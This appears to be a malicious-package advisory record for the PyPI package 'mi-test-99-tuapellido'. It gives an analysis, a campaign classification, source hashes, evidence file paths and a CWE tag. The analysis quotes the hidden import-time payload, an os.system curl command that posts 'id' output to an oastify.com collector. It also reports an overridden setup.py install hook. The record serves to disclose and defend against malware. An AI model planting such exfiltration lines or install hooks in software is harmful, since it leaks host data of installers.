-= Per source details. Do not edit below this line.=-
On every import, the package's top-level init.py runs os.system("curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $(id)"). This unconditionally executes a shell pipeline that POSTs the output of the id command (current uid/gid/group membership) to a Burp Suite Collaborator (oastify.com) subdomain — an out-of-band callback service used to confirm remote code execution and exfiltrate data. The behavior fires on import mi_test_99 with no user gating, no relation to any advertised functionality, over plaintext HTTP. Package metadata is placeholder-shaped (name contains the literal Spanish placeholder tuapellido/'your-surname', author fields are Tu Nombre <tu@email.com>, pyproject comment reads CAMBIA ESTO por un nombre único), consistent with a dependency-confusion or namespace-squat proof-of-concept payload. Whether intended as a test or a live attack, any installer that imports this package leaks host identity to an attacker-controlled collector and demonstrates an arbitrary-shell-exec channel.
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
The package overrides the install command in setup.py to execute malicious code during installation.
The OpenSSF Package Analysis project identified 'mi-test-99-tuapellido' @ 99.9 (pypi) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"versions": [
"99.9"
],
"sha256": "060712d1fb233a9a9be7115401704cd0ab7cb4f3e15dc1f58ad5ef4685d5fe37",
"modified_time": "2026-06-25T21:39:10.396761Z",
"source": "kam193",
"import_time": "2026-06-25T22:03:19.964581678Z",
"id": "pypi/GENERIC-standard-pypi-install-pentest/mi-test-99-tuapellido"
},
{
"versions": [
"99.9"
],
"sha256": "2d2263c69d2201d6f365635468e2e0b55f4bd4140098f9268223b8f6729af033",
"modified_time": "2026-06-25T21:11:03Z",
"source": "ossf-package-analysis",
"import_time": "2026-06-25T22:03:16.523052946Z"
},
{
"versions": [
"99.9"
],
"sha256": "4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39",
"modified_time": "2026-06-25T22:26:43Z",
"source": "amazon-inspector",
"id": "IN-MAL-2026-007551",
"import_time": "2026-06-25T23:00:33.896718873Z"
}
]
}{
"package_integrity": [
{
"filename": "mi_test_99_tuapellido-99.9-py3-none-any.whl",
"hashes": {
"sha256": "eb7f289692fe89595fc62b75d4b0e7084bfa68b5a0e6f1abb2c69f70974a6e2d",
"md5": "1b10c71755c89bb7bcdee87954f54e60",
"blake2b_256": "f16d65b3e09b200c6889e0d05c831f49391e479f7ca428fc76b29483dcf5220e"
}
},
{
"filename": "mi_test_99_tuapellido-99.9.tar.gz",
"hashes": {
"sha256": "afd2db2273ebb3ef6018efdcbcdf4eeb3e16e9a81c4745776cb2dfbc7792ae89",
"md5": "2fcc9fab43138fafd5ac0cb892bb8437",
"blake2b_256": "7bbee0f881b6f3d47c103747cef9deb49eba12c8f9fa91895df16c1411007a2f"
}
}
],
"evidence_files": [
{
"sha256": "3f76ca7a046099a8461c0e95dfa940aeb0a373c5945be4e931ce29336144288f",
"path": "src/mi_test_99/__init__.py",
"tlsh": "7ab012a84804143401c0990020a880c5841258caeb77349585404d148405ad51231d31"
},
{
"sha256": "4ee7ec2c31f1f2e06283c97083eb1ee10cdd98868da1034358f36e2e750e0c72",
"path": "pyproject.toml",
"tlsh": "f8f00e02a4c76f8a37c70084340d9501dcb091172ac4cc2a23ed874c9f5e84a85fcd25"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/mi-test-99-tuapellido/MAL-2026-6478.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]